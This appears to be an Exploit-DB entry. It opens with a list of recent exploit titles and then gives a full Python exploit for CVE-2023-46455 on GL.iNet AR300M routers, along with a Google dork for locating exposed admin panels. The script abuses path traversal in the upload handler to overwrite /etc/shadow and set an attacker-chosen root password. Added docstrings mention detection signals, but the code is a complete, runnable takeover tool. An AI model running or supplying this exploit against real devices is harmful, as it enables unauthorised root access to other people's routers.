
22 changes to exploits/shellcodes/ghdb GL.iNet AR300M v3.216 Remote Code Execution - CVE-2023-46456 Exploit GL.iNet AR300M v4.3.7 Arbitrary File Read - CVE-2023-46455 Exploit GL.iNet AR300M v4.3.7 Remote Code Execution - CVE-2023-46454 Exploit Maxima Max Pro Power - BLE Traffic Replay (Unauthenticated) R Radio Network FM Transmitter 1.07 system.cgi - Password Disclosure TitanNit Web Control 2.01 / Atemio 7600 - Root Remote Code Execution TPC-110W - Missing Authentication for Critical Function A-PDF All to MP3 Converter 2.0.0 - DEP Bypass via HeapCreate + HeapAlloc Easywall 0.3.1 - Authenticated Remote Command Execution Magento ver. 2.4.6 - XSLT Server Side Injection AC Repair and Services System v1.0 - Multiple SQL Injection Enrollment System v1.0 - SQL Injection Petrol Pump Management Software v.1.0 - SQL Injection Petrol Pump Management Software v.1.0 - Stored Cross Site Scripting via SVG file Petrol Pump Management Software v1.0 - 'Address' Stored Cross Site Scripting Petrol Pump Management Software v1.0 - Remote Code Execution via File Upload Real Estate Management System v1.0 - Remote Code Execution via File Upload Simple Student Attendance System v1.0 - 'classid' Time Based Blind & Union Based SQL Injection Simple Student Attendance System v1.0 - Time Based Blind SQL Injection Boss Mini 1.4.0 - local file inclusion Windows PowerShell - Event Log Bypass Single Quote Code Execution
#!/usr/bin/env python3
# Exploit Title: GL.iNet <= 4.3.7 Arbitrary File Write
# Google Dork: intitle:"GL.iNet Admin Panel"
# Date: XX/11/2023
# Exploit Author: Michele 'cyberaz0r' Di Bonaventura
# Vendor Homepage: https://www.gli-net.com
# Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/release4/openwrt-ar300m-4.3.7-0913-1694589403.tar
# Version: 4.3.7
# Tested on: GL.iNet AR300M
# CVE: CVE-2023-46455
import crypt
import requests
from sys import argv
# The upload request further down is sent with verify=False, i.e. TLS
# certificate validation is switched off for every request this script makes;
# this line only silences the InsecureRequestWarning urllib3 would otherwise
# print for each such request. It does not change what is sent on the wire.
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
def craft_shadow_file(salted_password):
    """Build a complete replacement for the target's /etc/shadow as a string.

    Args:
        salted_password: an already-hashed password in crypt(3) format (main()
            produces it with crypt.crypt); it is placed verbatim in the
            password field of the root entry.

    Returns:
        The whole shadow file as one newline-terminated string. Only the root
        entry carries a usable hash. The list of other accounts is hard-coded
        here rather than read from the device, so once this content is written
        any account not listed below is no longer present in the file — for
        forensics, an /etc/shadow consisting of exactly these entries is the
        on-disk artifact of this write, and file-integrity monitoring on
        /etc/shadow is the corresponding detection.
    """
    # root entry: fixed "last changed" day count (19459), min 0, max 99999,
    # warn 7; the inactive/expire/reserved fields are left empty.
    shadow_content = 'root:{}:19459:0:99999:7:::\n'.format(salted_password)
    # System accounts: '*' and 'x' are not valid crypt hashes, so none of these
    # accounts can authenticate with a password.
    shadow_content += 'daemon:*:0:0:99999:7:::\n'
    shadow_content += 'ftp:*:0:0:99999:7:::\n'
    shadow_content += 'network:*:0:0:99999:7:::\n'
    shadow_content += 'nobody:*:0:0:99999:7:::\n'
    shadow_content += 'dnsmasq:x:0:0:99999:7:::\n'
    shadow_content += 'stubby:x:0:0:99999:7:::\n'
    shadow_content += 'ntp:x:0:0:99999:7::\n'
    shadow_content += 'mosquitto:x:0:0:99999:7::\n'
    shadow_content += 'logd:x:0:0:99999:7::\n'
    shadow_content += 'ubus:x:0:0:99999:7::\n'
    return shadow_content
def replace_shadow_file(url, auth_token, shadow_content):
    """POST *shadow_content* to the device's upload handler as a multipart form.

    Args:
        url: full URL of the upload handler (main() passes base_url + '/upload').
        auth_token: session id sent in the 'sid' form field. The handler is
            authenticated — a valid session is a precondition for the write,
            which is why the script takes the token as an argument.
        shadow_content: body of the uploaded 'file' part.

    Returns:
        None. The HTTP response is discarded: there is no status-code or body
        check, so a rejected or failed write is not reported to the caller.
    """
    # requests sends each (filename, content) tuple as its own multipart part;
    # a filename of None marks the plain (non-file) fields.
    data = {
        'sid': (None, auth_token),
        # 'size' is sent as the constant '4'; how the server uses it is not
        # visible from this script.
        'size': (None, '4'),
        # The destination escapes the upload directory with '..' — this is the
        # path traversal tracked as CVE-2023-46455. Server-side, normalising
        # the path and requiring it to stay under the upload directory blocks
        # it; on the detection side, upload requests whose 'path' field
        # contains '..' are the signal to alert on in web-server logs.
        'path': (None, '/tmp/ovpn_upload/../../etc/shadow'),
        'file': ('shadow', shadow_content)
    }
    # verify=False: the server's TLS certificate is not validated.
    requests.post(url, files=data, verify=False)
def main(base_url, auth_token):
    """Prompt for a root password, build a shadow file around it and upload it.

    Args:
        base_url: origin of the target web UI (scheme://host[:port]); the
            string '/upload' is appended to it to form the handler URL.
        auth_token: authenticated session id, forwarded unchanged to
            replace_shadow_file().

    Returns:
        None. Progress is reported with print(); no success check is performed
        because replace_shadow_file() discards the HTTP response.
    """
    print('[+] Started GL.iNet <= 4.3.7 Arbitrary File Write exploit')

    password = input('[?] New password for root user: ')
    # MD5-based crypt ($1$). The crypt module is deprecated since Python 3.11
    # and removed in 3.13 (PEP 594), so this line fails on current interpreters.
    salted_password = crypt.crypt(password, salt=crypt.METHOD_MD5)

    shadow_content = craft_shadow_file(salted_password)
    print('[+] Crafted shadow file:\n{}'.format(shadow_content))

    print('[*] Replacing shadow file with the crafted one')
    replace_shadow_file(base_url+'/upload', auth_token, shadow_content)

    print('[+] Done')
if __name__ == '__main__':
    # Exactly two positional arguments are used: the target URL and the session
    # token; any further arguments are ignored.
    if len(argv) < 3:
        print('Usage: {} <TARGET_URL> <AUTH_TOKEN>'.format(argv[0]))
        # exit() is the site-module helper; sys.exit() is the form that does
        # not depend on site being loaded.
        exit(1)

    main(argv[1], argv[2])